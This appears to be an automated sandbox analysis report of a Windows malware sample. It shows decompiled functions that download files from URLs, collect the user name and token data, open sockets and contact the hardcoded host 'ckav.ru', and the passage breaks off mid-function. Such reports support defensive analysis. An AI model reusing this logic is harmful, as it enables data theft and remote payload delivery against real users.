                          				_t14 =  *_t13(0, _a4, _t30, 0, 0, __edi, _t20); // executed
                          				_t28 = _t14;
                          				if(_t28 == 0) {
                          					_t25 = _a24;
                          					if(_t25 != 0) {
                          						if(_t25 == 1) {
                          							_push(_t30);
                          							E004032E1();
                          						}
                          					} else {
                          						E004041E6(0, _t25, _t30, _a28, 0, 1);
                          					}
                          				}
                          				E00402BAB(_t30);
                          				return 0 | _t28 == 0x00000000;
                          			}












                          0x00406496
                          0x00406497
                          0x004064a4
                          0x004064a9
                          0x004064b0
                          0x00406509
                          0x00406509
                          0x004064bf
                          0x004064cb
                          0x004064cd
                          0x004064d1
                          0x004064d3
                          0x004064d8
                          0x004064ee
                          0x004064f0
                          0x004064f1
                          0x004064f6
                          0x004064da
                          0x004064e1
                          0x004064e6
                          0x004064d8
                          0x004064f8
                          0x00000000

                          APIs
                          • URLDownloadToFileW.URLMON(00000000,00000004,00000000,00000000,00000000,00000005,DB5F7604,00000000,00000000,00000000,00000000,?,?,00000004,0000000A), ref: 004064CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: DownloadFile
                          • String ID:
                          • API String ID: 1407266417-0
                          • Opcode ID: 071e399ec7af21538b868cc264b639d3431ba25e0254b9254fab110562a99bd8
                          • Instruction ID: 31f6f3cd4664c4fc69290711d1be470977221eb02724d5ca424450dbd89c53c8
                          • Opcode Fuzzy Hash: 071e399ec7af21538b868cc264b639d3431ba25e0254b9254fab110562a99bd8
                          • Instruction Fuzzy Hash: 1B01B1721001193FFB115EA59C86EFB2B5DDF457A8F01003AF904A51C1D97DDD6112A9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00406069(WCHAR* _a4, DWORD* _a8) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                          				_t4 = GetUserNameW(_a4, _a8); // executed
                          				return _t4;
                          			}





                          0x00406077
                          0x00406082
                          0x00406085

                          APIs
                          • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                          • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                          • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                          • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                          				int _v8;
                          				long _v12;
                          				int _v16;
                          				int _v20;
                          				char _v24;
                          				char _v28;
                          				char _v32;
                          				intOrPtr* _t25;
                          				int _t27;
                          				int _t30;
                          				int _t31;
                          				int _t36;
                          				int _t37;
                          				intOrPtr* _t39;
                          				int _t40;
                          				long _t44;
                          				intOrPtr* _t45;
                          				int _t46;
                          				void* _t48;
                          				int _t49;
                          				void* _t67;
                          				void* _t68;
                          				void* _t74;
                          
                          				_t48 = __ebx;
                          				_t67 = 0;
                          				_v8 = 0;
                          				E00402BF2();
                          				_t68 = __eax;
                          				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                          				_t2 =  &_v8; // 0x414449
                          				_push(1);
                          				_push(8);
                          				_push(_t68);
                          				if( *_t25() != 0) {
                          					L4:
                          					_t27 = E00402B7C(0x208);
                          					_v20 = _t27;
                          					__eflags = _t27;
                          					if(_t27 != 0) {
                          						E0040338C(_t27, _t67, 0x104);
                          						_t74 = _t74 + 0xc;
                          					}
                          					_push(_t48);
                          					_t49 = E00402B7C(0x208);
                          					__eflags = _t49;
                          					if(_t49 != 0) {
                          						E0040338C(_t49, _t67, 0x104);
                          						_t74 = _t74 + 0xc;
                          					}
                          					_v28 = 0x208;
                          					_v24 = 0x208;
                          					_t7 =  &_v8; // 0x414449
                          					_v12 = _t67;
                          					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                          					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                          					__eflags = _t30;
                          					if(_t30 == 0) {
                          						_t36 = E00402B7C(_v12);
                          						_v16 = _t36;
                          						__eflags = _t36;
                          						if(_t36 != 0) {
                          							_t14 =  &_v8; // 0x414449, executed
                          							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                          							__eflags = _t37;
                          							if(_t37 != 0) {
                          								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                          								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                          								__eflags = _t40;
                          								if(__eflags != 0) {
                          									_t67 = E00405B6F(__eflags, L"%s", _t49);
                          								}
                          							}
                          							E00402BAB(_v16);
                          						}
                          					}
                          					__eflags = _v8;
                          					if(_v8 != 0) {
                          						E00403C40(_v8); // executed
                          					}
                          					__eflags = _t49;
                          					if(_t49 != 0) {
                          						E00402BAB(_t49);
                          					}
                          					_t31 = _v20;
                          					__eflags = _t31;
                          					if(_t31 != 0) {
                          						E00402BAB(_t31);
                          					}
                          					return _t67;
                          				}
                          				_t44 = GetLastError();
                          				if(_t44 == 0x3f0) {
                          					E004060AC();
                          					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                          					_t3 =  &_v8; // 0x414449
                          					_t46 =  *_t45(_t44, 8, _t3);
                          					__eflags = _t46;
                          					if(_t46 == 0) {
                          						goto L2;
                          					}
                          					goto L4;
                          				}
                          				L2:
                          				return 0;
                          			}


























                          0x004061c3
                          0x004061cb
                          0x004061cd
                          0x004061d0
                          0x004061de
                          0x004061e0
                          0x004061e5
                          0x004061e9
                          0x004061eb
                          0x004061ed
                          0x004061f2
                          0x0040622a
                          0x00406230
                          0x00406235
                          0x00406239
                          0x0040623b
                          0x00406244
                          0x00406249
                          0x00406249
                          0x0040624c
                          0x00406253
                          0x00406256
                          0x00406258
                          0x00406261
                          0x00406266
                          0x00406266
                          0x00406270
                          0x00406273
                          0x00406276
                          0x0040627b
                          0x0040627e
                          0x0040628c
                          0x0040628e
                          0x00406290
                          0x00406295
                          0x0040629a
                          0x0040629e
                          0x004062a0
                          0x004062ac
                          0x004062af
                          0x004062b7
                          0x004062b9
                          0x004062c9
                          0x004062e0
                          0x004062e2
                          0x004062e4
                          0x004062f3
                          0x004062f3
                          0x004062e4
                          0x004062f8
                          0x004062fd
                          0x004062a0
                          0x004062fe
                          0x00406302
                          0x00406307
                          0x0040630c
                          0x0040630d
                          0x0040630f
                          0x00406312
                          0x00406317
                          0x00406318
                          0x0040631c
                          0x0040631e
                          0x00406321
                          0x00406326
                          0x00000000
                          0x00406327
                          0x004061f4
                          0x004061ff
                          0x00406208
                          0x00406218
                          0x0040621d
                          0x00406224
                          0x00406226
                          0x00406228
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406228
                          0x00406201
                          0x00000000

                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                          • _wmemset.LIBCMT ref: 00406244
                          • _wmemset.LIBCMT ref: 00406261
                          • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: _wmemset$ErrorInformationLastToken
                          • String ID: IDA$IDA
                          • API String ID: 487585393-2020647798
                          • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                          • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                          • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                          				signed int _v8;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				void _v40;
                          				void* _t23;
                          				signed int _t24;
                          				signed int* _t25;
                          				signed int _t30;
                          				signed int _t31;
                          				signed int _t33;
                          				signed int _t41;
                          				void* _t42;
                          				signed int* _t43;
                          
                          				_v8 = _v8 & 0x00000000;
                          				_t33 = 8;
                          				memset( &_v40, 0, _t33 << 2);
                          				_v32 = 1;
                          				_t23 =  &_v40;
                          				_v28 = 6;
                          				_v36 = 2;
                          				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                          				if(_t23 == 0) {
                          					_t24 = E00402B7C(4);
                          					_t43 = _t24;
                          					_t31 = _t30 | 0xffffffff;
                          					 *_t43 = _t31;
                          					_t41 = _v8;
                          					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                          					 *_t43 = _t24;
                          					if(_t24 != _t31) {
                          						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                          						if(_t24 == _t31) {
                          							E00404DE5(_t24,  *_t43);
                          							 *_t43 = _t31;
                          						}
                          						__imp__freeaddrinfo(_v8);
                          						if( *_t43 != _t31) {
                          							_t25 = _t43;
                          							goto L10;
                          						} else {
                          							E00402BAB(_t43);
                          							L8:
                          							_t25 = 0;
                          							L10:
                          							return _t25;
                          						}
                          					}
                          					E00402BAB(_t43);
                          					__imp__freeaddrinfo(_v8);
                          					goto L8;
                          				}
                          				return 0;
                          			}

















                          0x00404e1d
                          0x00404e26
                          0x00404e2a
                          0x00404e2f
                          0x00404e37
                          0x00404e3a
                          0x00404e45
                          0x00404e4f
                          0x00404e57
                          0x00404e61
                          0x00404e66
                          0x00404e68
                          0x00404e6c
                          0x00404e6e
                          0x00404e7a
                          0x00404e80
                          0x00404e84
                          0x00404e9f
                          0x00404ea7
                          0x00404eab
                          0x00404eb1
                          0x00404eb1
                          0x00404eb6
                          0x00404ebe
                          0x00404ecb
                          0x00000000
                          0x00404ec0
                          0x00404ec1
                          0x00404ec7
                          0x00404ec7
                          0x00404ecd
                          0x00000000
                          0x00404ece
                          0x00404ebe
                          0x00404e87
                          0x00404e90
                          0x00000000
                          0x00404e90
                          0x00000000

                          APIs
                          • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                          • socket.WS2_32(?,?,?), ref: 00404E7A
                          • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: freeaddrinfogetaddrinfosocket
                          • String ID:
                          • API String ID: 2479546573-0
                          • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                          • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                          • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                          • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                          				struct _SECURITY_ATTRIBUTES* _v8;
                          				char _v12;
                          				long _v16;
                          				void* __ebx;
                          				void* __edi;
                          				void* _t16;
                          				intOrPtr* _t25;
                          				long* _t28;
                          				void* _t30;
                          				int _t32;
                          				intOrPtr* _t33;
                          				void* _t35;
                          				void* _t42;
                          				intOrPtr _t43;
                          				long _t44;
                          				struct _OVERLAPPED* _t46;
                          
                          				_t46 = 0;
                          				_t35 = 0;
                          				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                          				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                          				_t42 = _t16;
                          				_v8 = _t42;
                          				if(_t42 == 0xffffffff) {
                          					__eflags = _a12;
                          					if(_a12 == 0) {
                          						L10:
                          						return _t35;
                          					}
                          					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                          					__eflags = _t43;
                          					if(_t43 == 0) {
                          						goto L10;
                          					}
                          					_push(0);
                          					__eflags = E00403C59(_a4, _t43);
                          					if(__eflags != 0) {
                          						_v8 = 0;
                          						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                          						_push(_t43);
                          						 *_a8 = _v8;
                          						E00403D44();
                          					}
                          					E00402BAB(_t43);
                          					return _t46;
                          				}
                          				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                          				_t44 =  *_t25(_t42,  &_v12);
                          				if(_v12 != 0 || _t44 > 0x40000000) {
                          					L8:
                          					_t45 = _v8;
                          					goto L9;
                          				} else {
                          					_t28 = _a8;
                          					if(_t28 != 0) {
                          						 *_t28 = _t44;
                          					}
                          					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                          					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                          					_t35 = _t30;
                          					if(_t35 == 0) {
                          						goto L8;
                          					} else {
                          						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                          						_t45 = _v8;
                          						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                          						if(_t32 == 0) {
                          							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                          							 *_t33(_t35, _t46, 0x8000);
                          							_t35 = _t46;
                          						}
                          						L9:
                          						E00403C40(_t45); // executed
                          						goto L10;
                          					}
                          				}
                          			}



















                          0x004040c4
                          0x004040ce
                          0x004040d0
                          0x004040e8
                          0x004040ea
                          0x004040ec
                          0x004040f2
                          0x0040418d
                          0x00404190
                          0x00404184
                          0x00000000
                          0x00404184
                          0x004041a0
                          0x004041a5
                          0x004041a7
                          0x00000000
                          0x00000000
                          0x004041a9
                          0x004041b6
                          0x004041b8
                          0x004041be
                          0x004041cb
                          0x004041d0
                          0x004041d1
                          0x004041d3
                          0x004041d8
                          0x004041dc
                          0x00000000
                          0x004041e2
                          0x00404100
                          0x0040410c
                          0x00404111
                          0x0040417a
                          0x0040417a
                          0x00000000
                          0x0040411b
                          0x0040411b
                          0x00404120
                          0x00404122
                          0x00404122
                          0x0040412c
                          0x0040413a
                          0x0040413c
                          0x00404140
                          0x00000000
                          0x00404142
                          0x0040414a
                          0x00404155
                          0x0040415a
                          0x0040415e
                          0x00404168
                          0x00404174
                          0x00404176
                          0x00404176
                          0x0040417d
                          0x0040417e
                          0x00000000
                          0x00404183
                          0x00404140

                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                          • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: File$AllocCreateReadVirtual
                          • String ID: .tmp
                          • API String ID: 3585551309-2986845003
                          • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                          • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                          • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00413866(void* __eflags) {
                          				short _v6;
                          				short _v8;
                          				short _v10;
                          				short _v12;
                          				short _v14;
                          				short _v16;
                          				short _v18;
                          				short _v20;
                          				short _v22;
                          				char _v24;
                          				short _v28;
                          				short _v30;
                          				short _v32;
                          				short _v34;
                          				short _v36;
                          				short _v38;
                          				short _v40;
                          				short _v42;
                          				short _v44;
                          				short _v46;
                          				char _v48;
                          				short _v52;
                          				short _v54;
                          				short _v56;
                          				short _v58;
                          				short _v60;
                          				short _v62;
                          				short _v64;
                          				short _v66;
                          				short _v68;
                          				short _v70;
                          				short _v72;
                          				short _v74;
                          				char _v76;
                          				void* __ebx;
                          				void* __edi;
                          				void* _t38;
                          				short _t43;
                          				short _t44;
                          				short _t45;
                          				short _t46;
                          				short _t47;
                          				short _t48;
                          				short _t50;
                          				short _t51;
                          				short _t52;
                          				short _t54;
                          				short _t55;
                          				intOrPtr* _t57;
                          				intOrPtr* _t59;
                          				intOrPtr* _t61;
                          				void* _t63;
                          				WCHAR* _t65;
                          				long _t68;
                          				void* _t75;
                          				short _t76;
                          				short _t78;
                          				short _t83;
                          				short _t84;
                          				short _t85;
                          
                          				E00402C6C(_t38);
                          				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                          				SetErrorMode(3); // executed
                          				_t43 = 0x4f;
                          				_v76 = _t43;
                          				_t44 = 0x4c;
                          				_v74 = _t44;
                          				_t45 = 0x45;
                          				_v72 = _t45;
                          				_t46 = 0x41;
                          				_v70 = _t46;
                          				_t47 = 0x55;
                          				_v68 = _t47;
                          				_t48 = 0x54;
                          				_t76 = 0x33;
                          				_t84 = 0x32;
                          				_t83 = 0x2e;
                          				_t78 = 0x64;
                          				_t85 = 0x6c;
                          				_v66 = _t48;
                          				_v52 = 0;
                          				_t50 = 0x77;
                          				_v48 = _t50;
                          				_t51 = 0x73;
                          				_v46 = _t51;
                          				_t52 = 0x5f;
                          				_v42 = _t52;
                          				_v28 = 0;
                          				_t54 = 0x6f;
                          				_v24 = _t54;
                          				_t55 = 0x65;
                          				_v20 = _t55;
                          				_v64 = _t76;
                          				_v62 = _t84;
                          				_v60 = _t83;
                          				_v58 = _t78;
                          				_v56 = _t85;
                          				_v54 = _t85;
                          				_v44 = _t84;
                          				_v40 = _t76;
                          				_v38 = _t84;
                          				_v36 = _t83;
                          				_v34 = _t78;
                          				_v32 = _t85;
                          				_v30 = _t85;
                          				_v22 = _t85;
                          				_v18 = _t76;
                          				_v16 = _t84;
                          				_v14 = _t83;
                          				_v12 = _t78;
                          				_v10 = _t85;
                          				_v8 = _t85;
                          				_v6 = 0;
                          				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				 *_t57( &_v76);
                          				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				 *_t59( &_v48);
                          				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                          				_t81 =  &_v24;
                          				 *_t61( &_v24); // executed
                          				_t63 = E00414059(); // executed
                          				if(_t63 != 0) {
                          					_t65 = E00413D97(0);
                          					E004031E5(0, 0, 0xcf167df4, 0, 0);
                          					CreateMutexW(0, 1, _t65); // executed
                          					_t68 = GetLastError();
                          					_t92 = _t68 - 0xb7;
                          					if(_t68 == 0xb7) {
                          						E00413B81(0);
                          						_pop(_t81); // executed
                          					}
                          					E00413003(_t92); // executed
                          					E00412B2E(_t92); // executed
                          					E00412D31(_t81, _t84); // executed
                          					E00413B3F();
                          					E00413B81(0);
                          					 *0x49fdd0 = 1;
                          				}
                          				return 0;
                          			}































































                          0x0041386f
                          0x0041387e
                          0x00413885
                          0x00413889
                          0x0041388c
                          0x00413890
                          0x00413893
                          0x00413897
                          0x0041389a
                          0x0041389e
                          0x004138a1
                          0x004138a5
                          0x004138a8
                          0x004138ac
                          0x004138af
                          0x004138b2
                          0x004138b5
                          0x004138b8
                          0x004138bb
                          0x004138bc
                          0x004138c4
                          0x004138c8
                          0x004138cb
                          0x004138cf
                          0x004138d2
                          0x004138d6
                          0x004138d7
                          0x004138df
                          0x004138e3
                          0x004138e4
                          0x004138ea
                          0x004138eb
                          0x004138f1
                          0x004138f5
                          0x004138f9
                          0x004138fd
                          0x00413901
                          0x00413905
                          0x00413909
                          0x0041390d
                          0x00413911
                          0x00413915
                          0x00413919
                          0x0041391d
                          0x00413921
                          0x00413925
                          0x00413929
                          0x0041392d
                          0x00413931
                          0x00413935
                          0x00413939
                          0x0041393d
                          0x00413941
                          0x00413950
                          0x00413959
                          0x0041395f
                          0x00413968
                          0x0041396e
                          0x00413973
                          0x00413977
                          0x00413979
                          0x00413980
                          0x00413982
                          0x00413991
                          0x0041399c
                          0x0041399e
                          0x004139a4
                          0x004139a9
                          0x004139ac
                          0x004139b1
                          0x004139b1
                          0x004139b2
                          0x004139b7
                          0x004139bc
                          0x004139c1
                          0x004139c7
                          0x004139cd
                          0x004139cd
                          0x004139db

                          APIs
                          • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                          • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                          • GetLastError.KERNEL32 ref: 0041399E
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: Error$CreateLastModeMutex
                          • String ID:
                          • API String ID: 3448925889-0
                          • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                          • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                          				long _v8;
                          				void* _t7;
                          				long _t10;
                          				void* _t21;
                          				struct _OVERLAPPED* _t24;
                          
                          				_t14 = __ebx;
                          				_t24 = 0;
                          				_v8 = 0;
                          				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                          				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                          				_t21 = _t7;
                          				if(_t21 != 0xffffffff) {
                          					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                          					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                          					if(_t10 != 0xffffffff) {
                          						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                          						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                          						_t24 =  !=  ? 1 : 0;
                          					}
                          					E00403C40(_t21); // executed
                          				}
                          				return _t24;
                          			}








                          0x004042cf
                          0x004042d5
                          0x004042df
                          0x004042e2
                          0x004042f9
                          0x004042fb
                          0x00404300
                          0x0040430a
                          0x00404314
                          0x00404319
                          0x00404323
                          0x00404334
                          0x0040433b
                          0x0040433b
                          0x0040433f
                          0x00404344
                          0x0040434c

                          APIs
                          • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                          • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID: File$CreatePointerWrite
                          • String ID:
                          • API String ID: 3672724799-0
                          • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                          • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                          • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 34%
                          			E00412D31(void* __ecx, void* __edi) {
                          				long _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				char _v24;
                          				char _v40;
                          				void* __ebx;
                          				intOrPtr* _t10;
                          				void* _t11;
                          				void* _t25;
                          				void* _t26;
                          				void* _t27;
                          				void* _t35;
                          				void* _t53;
                          				char* _t57;
                          				void* _t58;
                          				void* _t61;
                          				void* _t64;
                          				void* _t65;
                          				intOrPtr* _t66;
                          				void* _t67;
                          				void* _t68;
                          				void* _t69;
                          				void* _t70;
                          				void* _t71;
                          				void* _t72;
                          				void* _t73;
                          
                          				_t53 = __ecx;
                          				_t10 =  *0x49fde0;
                          				_t68 = _t67 - 0x24;
                          				 *0x49fddc = 0x927c0;
                          				 *0x49fde4 = 0;
                          				_t75 = _t10;
                          				if(_t10 != 0) {
                          					L16:
                          					_push(1);
                          					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                          					_t61 = _t11;
                          					_t68 = _t68 + 0xc;
                          					if(_t61 != 0) {
                          						E004031E5(0, 0, 0xfcae4162, 0, 0);
                          						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                          					}
                          					L004067C4(0xea60); // executed
                          					_pop(_t53);
                          				} else {
                          					_push(__edi);
                          					 *0x49fde0 = E004056BF(0x2bc);
                          					E00413DB7(_t53, _t75,  &_v40);
                          					_t57 =  &_v24;
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					E004058D4( *0x49fde0, 0x12);
                          					E004058D4( *0x49fde0, 0x28);
                          					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                          					_t69 = _t68 + 0x28;
                          					_t64 = E0040632F();
                          					_push(0);
                          					_push(1);
                          					if(_t64 == 0) {
                          						_push(0);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t70 = _t69 + 0x10;
                          					} else {
                          						_push(_t64);
                          						_push( *0x49fde0);
                          						E00405872();
                          						E00402BAB(_t64);
                          						_t70 = _t69 + 0x14;
                          					}
                          					_t58 = E00406130(_t57);
                          					_push(0);
                          					_push(1);
                          					_t77 = _t64;
                          					if(_t64 == 0) {
                          						_push(0);
                          						_push( *0x49fde0);
                          						_t25 = E00405872();
                          						_t71 = _t70 + 0x10; // executed
                          					} else {
                          						_push(_t58);
                          						_push( *0x49fde0);
                          						E00405872();
                          						_t25 = E00402BAB(_t58);
                          						_t71 = _t70 + 0x14;
                          					}
                          					_t26 = E004061C3(_t25, 0, _t77); // executed
                          					_t65 = _t26;
                          					_push(0);
                          					_push(1);
                          					if(_t65 == 0) {
                          						_push(0);
